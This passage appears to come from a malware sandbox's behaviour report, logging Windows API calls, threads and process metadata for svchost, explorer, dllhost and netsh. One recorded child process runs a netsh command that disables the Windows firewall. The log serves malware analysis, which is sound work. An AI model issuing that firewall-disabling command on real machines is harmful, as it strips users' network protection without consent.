IUnknown:AddRef (This=0x19cb9f25c50) returned 0xe [0247.839] IUnknown:Release (This=0x19cb9f25c50) returned 0xd [0247.839] IUnknown:QueryInterface (This=0x19cb9f25c50, riid=0x7ffaab192598*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x6969a7e6a0) [0247.839] IUnknown:AddRef (This=0x19cb9f25c50) returned 0xe [0248.455] IUnknown:Release (This=0x19cb9f25c50) returned 0xd [0248.456] IUnknown:QueryInterface (This=0x19cb9f25c50, riid=0x7ffaab192598*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x6969a7e6a0) [0248.456] IUnknown:AddRef (This=0x19cb9f25c50) returned 0xe [0248.681] IUnknown:Release (This=0x19cb9f25c50) returned 0xd [0248.681] IUnknown:QueryInterface (This=0x19cb9f25c50, riid=0x7ffaab192598*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x6969a7e6a0) [0248.681] IUnknown:AddRef (This=0x19cb9f25c50) returned 0xe [0249.113] IUnknown:Release (This=0x19cb9f25c50) returned 0xd [0249.113] IUnknown:QueryInterface (This=0x19cb9f25c50, riid=0x7ffaab192598*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x6969a7e6a0) [0249.113] IUnknown:AddRef (This=0x19cb9f25c50) returned 0xe [0249.450] IUnknown:Release (This=0x19cb9f25c50) returned 0xd [0249.450] IUnknown:AddRef (This=0x19cb9f25c50) returned 0xe [0249.450] GetCurrentThreadId () returned 0x1148 [0249.451] PostThreadMessageW (idThread=0x1148, Msg=0x8001, wParam=0x0, lParam=0x0) returned 1 [0249.457] GetMessageW (in: lpMsg=0x6969a7fda0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x6969a7fda0) returned 1 [0249.457] CompareStringOrdinal (lpString1="openas", cchCount1=-1, lpString2="open", cchCount2=-1, bIgnoreCase=1) returned 3 [0249.457] CompareStringOrdinal (lpString1="OpenWithSetDefaultOn", cchCount1=-1, lpString2="open", cchCount2=-1, bIgnoreCase=1) returned 3 [0249.458] IUnknown_QueryService (in: punk=0x19cb848ce00, guidService=0x7ff78262d3c8*(Data1=0x94724f59, Data2=0xeb2c, Data3=0x4efb, Data4=([0]=0xad, [1]=0x2b, [2]=0x85, [3]=0x38, [4]=0xf6, [5]=0x49, [6]=0x6f, [7]=0x7d)), riid=0x7ff78262d100*(Data1=0x94724f59, Data2=0xeb2c, Data3=0x4efb, Data4=([0]=0xad, [1]=0x2b, [2]=0x85, [3]=0x38, [4]=0xf6, [5]=0x49, [6]=0x6f, [7]=0x7d)), ppvOut=0x6969a7fd88 | out: ppvOut=0x6969a7fd88*=0x0) returned 0x80004001 [0249.689] IUnknown_Set (in: ppunk=0x19cb9f25c70*=0x19cb848ce00, punk=0x0 | out: ppunk=0x19cb9f25c70*=0x0) [0250.346] QISearch (in: that=0x19cb9f25c40, pqit=0x7ff78262c400, riid=0x7ff78262d1d0*(Data1=0x1c9cd5bb, Data2=0x98e9, Data3=0x4491, Data4=([0]=0xa6, [1]=0xf, [2]=0x31, [3]=0xaa, [4]=0xcc, [5]=0x72, [6]=0xb8, [7]=0x3c)), ppv=0x6969a7fd78 | out: that=0x19cb9f25c40, ppv=0x6969a7fd78*=0x19cb9f25c88) returned 0x0 [0250.347] IUnknown:QueryInterface (in: This=0x19cb848ce78, riid=0x7ff78262d290*(Data1=0xb63ea76d, Data2=0x1f85, Data3=0x456f, Data4=([0]=0xa1, [1]=0x9c, [2]=0x48, [3]=0x15, [4]=0x9e, [5]=0xfa, [6]=0x85, [7]=0x8b)), ppvObject=0x6969a7fd70 | out: ppvObject=0x6969a7fd70*=0x19cb848ce78) returned 0x0 [0250.347] IShellItemArray:GetItemAt (in: This=0x19cb848ce78, dwIndex=0x0, ppsi=0x6969a7fd78 | out: ppsi=0x6969a7fd78*=0x19cb8495f88) returned 0x0 [0250.349] IUnknown:QueryInterface (in: This=0x19cb8495f88, riid=0x7ff78262d2a0*(Data1=0x7e9fb0d3, Data2=0x919f, Data3=0x4307, Data4=([0]=0xab, [1]=0x2e, [2]=0x9b, [3]=0x18, [4]=0x60, [5]=0x31, [6]=0xc, [7]=0x93)), ppvObject=0x6969a7fd80 | out: ppvObject=0x6969a7fd80*=0x19cb8495f88) returned 0x0 [0250.349] IUnknown:Release (This=0x19cb8495f88) returned 0x1 [0250.350] IShellItem:BindToHandler (in: This=0x19cb8495f88, pbc=0x0, bhid=0x7ff78262d420, riid=0x7ff78262d280, ppv=0x6969a7fd78 | out: ppv=0x6969a7fd78) returned 0x0 [0251.078] IUnknown:Release (This=0x19cb8495f88) returned 0x0 [0251.078] IUnknown:Release (This=0x19cb848ce78) returned 0x1 [0251.079] IUnknown:AddRef (This=0x19cb9f25c88) returned 0x4 [0251.079] IObjectWithSelection:GetSelection (This=0x19cb9f25c88, riid=0x7ffa9700a948, ppv=0x19cba274a28) [0251.079] IUnknown:Release (This=0x19cb9f25c88) returned 0x3 [0298.857] IUnknown:QueryInterface (This=0x19cb9f25c50, riid=0x7ffaab192598*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x6969a7e5c0) [0298.858] IUnknown:AddRef (This=0x19cb9f25c50) returned 0x4 [0298.858] IUnknown:Release (This=0x19cb9f25c50) returned 0x3 [0298.876] IUnknown:QueryInterface (in: This=0x19cb9f25c50, riid=0x7ffaaa13e700*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6969a7e168 | out: ppvObject=0x6969a7e168*=0x0) returned 0x80004005 [0298.899] IUnknown:QueryInterface (This=0x19cb9f25c50, riid=0x7ffaab192598*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x6969a7e0c0) [0298.899] IUnknown:AddRef (This=0x19cb9f25c50) returned 0x4 [0298.900] IUnknown:Release (This=0x19cb9f25c50) returned 0x3 [0299.313] IUnknown:QueryInterface (This=0x19cb9f25c50, riid=0x7ffaab192598*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x6969a7e0d0) [0299.313] IUnknown:AddRef (This=0x19cb9f25c50) returned 0x4 [0299.313] IUnknown:Release (This=0x19cb9f25c50) returned 0x3 [0299.313] IUnknown:QueryInterface (This=0x19cb9f25c50, riid=0x7ffaab192598*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x6969a7dff0) [0299.313] IUnknown:AddRef (This=0x19cb9f25c50) returned 0x4 [0299.313] IUnknown:Release (This=0x19cb9f25c50) returned 0x3 [0299.446] IUnknown:QueryInterface (This=0x19cb9f25c50, riid=0x7ffaab192598*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x6969a7e010) [0299.446] IUnknown:AddRef (This=0x19cb9f25c50) returned 0x4 [0299.446] IUnknown:Release (This=0x19cb9f25c50) returned 0x3 [0299.455] IUnknown:QueryInterface (This=0x19cb9f25c50, riid=0x7ffaab192598*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x6969a7e080) [0299.456] IUnknown:AddRef (This=0x19cb9f25c50) returned 0x4 [0299.456] IUnknown:Release (This=0x19cb9f25c50) returned 0x3 [0299.465] IUnknown:QueryInterface (This=0x19cb9f25c50, riid=0x7ffaab192598*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x6969a7e040) [0299.465] IUnknown:AddRef (This=0x19cb9f25c50) returned 0x4 [0299.465] IUnknown:Release (This=0x19cb9f25c50) returned 0x3 [0299.467] IUnknown:QueryInterface (This=0x19cb9f25c50, riid=0x7ffaab192598*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x6969a7dd70) [0299.467] IUnknown:AddRef (This=0x19cb9f25c50) returned 0x4 [0299.467] IUnknown:Release (This=0x19cb9f25c50) returned 0x3 [0301.357] IUnknown:QueryInterface (This=0x19cb9f25c50, riid=0x7ffaab192598*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x6969a7dcf0) [0301.358] IUnknown:AddRef (This=0x19cb9f25c50) returned 0x4 [0301.358] IUnknown:Release (This=0x19cb9f25c50) returned 0x3 [0301.358] IUnknown:QueryInterface (This=0x19cb9f25c50, riid=0x7ffaab192598*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x6969a7dcf0) [0301.358] IUnknown:AddRef (This=0x19cb9f25c50) returned 0x4 [0301.358] IUnknown:Release (This=0x19cb9f25c50) returned 0x3 [0303.968] IUnknown:QueryInterface (This=0x19cb9f25c50, riid=0x7ffaab192598*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x6969a7db80) [0303.968] IUnknown:AddRef (This=0x19cb9f25c50) returned 0x4 [0303.968] IUnknown:Release (This=0x19cb9f25c50) returned 0x3 [0304.301] IUnknown:QueryInterface (This=0x19cb9f25c50, riid=0x7ffaab192598*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x6969a7dba0) [0304.301] IUnknown:AddRef (This=0x19cb9f25c50) returned 0x4 [0304.302] IUnknown:Release (This=0x19cb9f25c50) returned 0x3 [0304.302] IUnknown:QueryInterface (This=0x19cb9f25c50, riid=0x7ffaab192598*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x6969a7db80) [0304.302] IUnknown:AddRef (This=0x19cb9f25c50) returned 0x4 [0304.302] IUnknown:Release (This=0x19cb9f25c50) returned 0x3 [0304.304] IUnknown:QueryInterface (This=0x19cb9f25c50, riid=0x7ffaab192598*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x6969a7dd40) [0304.304] IUnknown:AddRef (This=0x19cb9f25c50) returned 0x4 [0304.304] IUnknown:Release (This=0x19cb9f25c50) returned 0x3 [0304.304] IUnknown:QueryInterface (This=0x19cb9f25c50, riid=0x7ffaab192598*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x6969a7dd70) [0304.305] IUnknown:AddRef (This=0x19cb9f25c50) returned 0x4 [0304.305] IUnknown:Release (This=0x19cb9f25c50) returned 0x3 Thread: id = 216 os_tid = 0x11c4 Thread: id = 278 os_tid = 0x420 Thread: id = 279 os_tid = 0x121c Thread: id = 280 os_tid = 0x8d8 Thread: id = 282 os_tid = 0x11d8 Thread: id = 283 os_tid = 0x2a8 Thread: id = 304 os_tid = 0xd90 Thread: id = 305 os_tid = 0xff8 Thread: id = 306 os_tid = 0x1160 Thread: id = 312 os_tid = 0x4cc Process: id = "21" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x52a38000" os_pid = "0x3e8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "11" os_parent_pid = "0x244" cmd_line = "C:\\WINDOWS\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AJRouter" [0xa], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xa], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\icssvc" [0xa], "NT SERVICE\\lmhosts" [0xe], "NT SERVICE\\NgcCtnrSvc" [0xa], "NT SERVICE\\RmSvc" [0xa], "NT SERVICE\\TimeBrokerSvc" [0xa], "NT SERVICE\\TimeBroker" [0xa], "NT SERVICE\\vmictimesync" [0xa], "S-1-5-80-1495648203-2503502111-1597754693-3445174711-1316708627" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000a2f7" [0xc000000f], "LOCAL" [0x7] Thread: id = 189 os_tid = 0x131c Thread: id = 190 os_tid = 0xcd0 Thread: id = 191 os_tid = 0x620 Thread: id = 192 os_tid = 0xd28 Thread: id = 193 os_tid = 0x4c8 Thread: id = 194 os_tid = 0xf54 Thread: id = 195 os_tid = 0xf24 Thread: id = 196 os_tid = 0xbec Thread: id = 197 os_tid = 0x5b4 Thread: id = 198 os_tid = 0x454 Thread: id = 199 os_tid = 0x428 Thread: id = 200 os_tid = 0x424 Thread: id = 201 os_tid = 0x410 Thread: id = 202 os_tid = 0x40c Thread: id = 203 os_tid = 0x408 Thread: id = 204 os_tid = 0x350 Thread: id = 205 os_tid = 0x194 Thread: id = 206 os_tid = 0x198 Thread: id = 207 os_tid = 0x3ec Process: id = "22" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x42819000" os_pid = "0x9dc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "20" os_parent_pid = "0xffffffffffffffff" cmd_line = "C:\\WINDOWS\\Explorer.EXE" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f8ee" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 217 os_tid = 0x884 Thread: id = 218 os_tid = 0xecc Thread: id = 219 os_tid = 0xfe4 Thread: id = 220 os_tid = 0xd68 Thread: id = 221 os_tid = 0xd40 Thread: id = 222 os_tid = 0xcb8 Thread: id = 223 os_tid = 0xc80 Thread: id = 224 os_tid = 0xc7c Thread: id = 225 os_tid = 0xc78 Thread: id = 226 os_tid = 0xc74 Thread: id = 227 os_tid = 0xc6c Thread: id = 228 os_tid = 0xc60 Thread: id = 229 os_tid = 0xc58 Thread: id = 230 os_tid = 0xc54 Thread: id = 231 os_tid = 0xc38 Thread: id = 232 os_tid = 0xc2c Thread: id = 233 os_tid = 0xbe8 Thread: id = 234 os_tid = 0xbc4 Thread: id = 235 os_tid = 0xb24 Thread: id = 236 os_tid = 0xb20 Thread: id = 237 os_tid = 0xb1c Thread: id = 238 os_tid = 0xb18 Thread: id = 239 os_tid = 0xb14 Thread: id = 240 os_tid = 0xb10 Thread: id = 241 os_tid = 0xb0c Thread: id = 242 os_tid = 0xb08 Thread: id = 243 os_tid = 0xb04 Thread: id = 244 os_tid = 0xb00 Thread: id = 245 os_tid = 0xafc Thread: id = 246 os_tid = 0xaf8 Thread: id = 247 os_tid = 0xaf4 Thread: id = 248 os_tid = 0xaf0 Thread: id = 249 os_tid = 0xaec Thread: id = 250 os_tid = 0xae4 Thread: id = 251 os_tid = 0xae0 Thread: id = 252 os_tid = 0xac4 Thread: id = 253 os_tid = 0xaa4 Thread: id = 254 os_tid = 0xaa0 Thread: id = 255 os_tid = 0xa9c Thread: id = 256 os_tid = 0xa94 Thread: id = 257 os_tid = 0xa90 Thread: id = 258 os_tid = 0xa88 Thread: id = 259 os_tid = 0xa84 Thread: id = 260 os_tid = 0xa48 Thread: id = 261 os_tid = 0xa44 Thread: id = 262 os_tid = 0xa40 Thread: id = 263 os_tid = 0xa3c Thread: id = 264 os_tid = 0xa38 Thread: id = 265 os_tid = 0xa34 Thread: id = 266 os_tid = 0xa30 Thread: id = 267 os_tid = 0xa2c Thread: id = 268 os_tid = 0xa28 Thread: id = 269 os_tid = 0xa1c Thread: id = 270 os_tid = 0xa18 Thread: id = 271 os_tid = 0xa0c Thread: id = 272 os_tid = 0xa00 Thread: id = 273 os_tid = 0x9fc Thread: id = 274 os_tid = 0x9f8 Thread: id = 275 os_tid = 0x9e0 Thread: id = 308 os_tid = 0x84c Thread: id = 309 os_tid = 0x115c Thread: id = 310 os_tid = 0xcdc Thread: id = 311 os_tid = 0xe80 Thread: id = 313 os_tid = 0x47c Thread: id = 355 os_tid = 0xe34 Thread: id = 357 os_tid = 0xe28 Thread: id = 358 os_tid = 0xe14 Thread: id = 359 os_tid = 0x12f8 Thread: id = 360 os_tid = 0x1040 Thread: id = 361 os_tid = 0x35c Process: id = "23" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0xd158000" os_pid = "0xfa0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "22" os_parent_pid = "0x2ac" cmd_line = "C:\\WINDOWS\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f8ee" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 284 os_tid = 0xe3c Thread: id = 285 os_tid = 0x12e0 Thread: id = 286 os_tid = 0x12dc Thread: id = 287 os_tid = 0xfb4 Thread: id = 288 os_tid = 0x12b4 Thread: id = 289 os_tid = 0xec4 Thread: id = 290 os_tid = 0xf98 Process: id = "24" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x2ab59000" os_pid = "0x12c0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "20" os_parent_pid = "0x2ac" cmd_line = "C:\\WINDOWS\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f8ee" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 292 os_tid = 0x120c Thread: id = 293 os_tid = 0xe7c Thread: id = 294 os_tid = 0xe5c Thread: id = 295 os_tid = 0x928 Thread: id = 296 os_tid = 0x136c Thread: id = 297 os_tid = 0x1340 Thread: id = 298 os_tid = 0x1338 Process: id = "25" image_name = "netsh.exe" filename = "c:\\windows\\syswow64\\netsh.exe" page_root = "0x21791000" os_pid = "0x9a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "19" os_parent_pid = "0xd6c" cmd_line = "\"netsh.exe\" adv firewall set opmode mode disable" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f8ee" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 299 os_tid = 0xea8 [0293.109] GetModuleHandleA (lpModuleName=0x0) returned 0x920000 [0293.109] __set_app_type (_Type=0x1) [0293.109] __p__fmode () returned 0x74ff3c14 [0293.109] __p__commode () returned 0x74ff49ec [0293.109] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x929a90) returned 0x0 [0293.110] __wgetmainargs (in: _Argc=0x9333e8, _Argv=0x9333ec, _Env=0x9333f0, _DoWildCard=0, _StartInfo=0x9333fc | out: _Argc=0x9333e8, _Argv=0x9333ec, _Env=0x9333f0) returned 0 [0293.114] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0293.114] GetModuleHandleW (lpModuleName=0x0) returned 0x920000 [0293.115] _vsnwprintf (in: _Buffer=0x934ae0, _BufferCount=0x1fff, _Format="%s>", _ArgList=0x39799c | out: _Buffer="netsh>") returned 6 [0293.116] GetProcessHeap () returned 0x2b30000 [0293.116] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3bbc8 [0293.116] GetProcessHeap () returned 0x2b30000 [0293.117] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3bbe8 [0293.117] GetProcessHeap () returned 0x2b30000 [0293.117] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3bc18 [0293.117] GetProcessHeap () returned 0x2b30000 [0293.117] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3bcd8 [0293.117] GetProcessHeap () returned 0x2b30000 [0293.117] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3bce8 [0293.117] GetProcessHeap () returned 0x2b30000 [0293.117] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3bc28 [0293.117] GetProcessHeap () returned 0x2b30000 [0293.117] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3bd38 [0293.117] GetProcessHeap () returned 0x2b30000 [0293.117] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3bc38 [0293.118] GetProcessHeap () returned 0x2b30000 [0293.118] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3bc48 [0293.118] GetProcessHeap () returned 0x2b30000 [0293.118] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3bc58 [0293.118] GetProcessHeap () returned 0x2b30000 [0293.118] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d080 [0293.118] GetProcessHeap () returned 0x2b30000 [0293.118] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d0a0 [0293.118] GetProcessHeap () returned 0x2b30000 [0293.118] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3cff0 [0293.118] GetProcessHeap () returned 0x2b30000 [0293.118] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3cf50 [0293.118] GetProcessHeap () returned 0x2b30000 [0293.119] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3cfa0 [0293.119] GetProcessHeap () returned 0x2b30000 [0293.119] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3cfb0 [0293.119] GetProcessHeap () returned 0x2b30000 [0293.119] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d0b0 [0293.119] GetProcessHeap () returned 0x2b30000 [0293.119] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d000 [0293.119] GetProcessHeap () returned 0x2b30000 [0293.119] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d060 [0293.119] GetProcessHeap () returned 0x2b30000 [0293.119] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d0e0 [0293.119] GetProcessHeap () returned 0x2b30000 [0293.119] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d070 [0293.119] GetProcessHeap () returned 0x2b30000 [0293.119] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d0c0 [0293.120] GetProcessHeap () returned 0x2b30000 [0293.120] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d010 [0293.120] GetProcessHeap () returned 0x2b30000 [0293.120] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3cfc0 [0293.120] GetProcessHeap () returned 0x2b30000 [0293.120] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3cfd0 [0293.120] GetProcessHeap () returned 0x2b30000 [0293.120] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d040 [0293.120] GetProcessHeap () returned 0x2b30000 [0293.120] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d020 [0293.120] GetProcessHeap () returned 0x2b30000 [0293.120] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d100 [0293.120] GetProcessHeap () returned 0x2b30000 [0293.121] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d090 [0293.121] GetProcessHeap () returned 0x2b30000 [0293.121] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3cfe0 [0293.121] GetProcessHeap () returned 0x2b30000 [0293.121] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3cf70 [0293.121] GetProcessHeap () returned 0x2b30000 [0293.121] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d050 [0293.121] GetProcessHeap () returned 0x2b30000 [0293.121] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d030 [0293.121] GetProcessHeap () returned 0x2b30000 [0293.121] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, Size=0x8) returned 0x2b3d0d0 [0293.121] GetProcessHeap () returned 0x2b30000 [0293.122] RtlAllocateHeap (HeapHandle=0x2b30000, Flags=0x0, 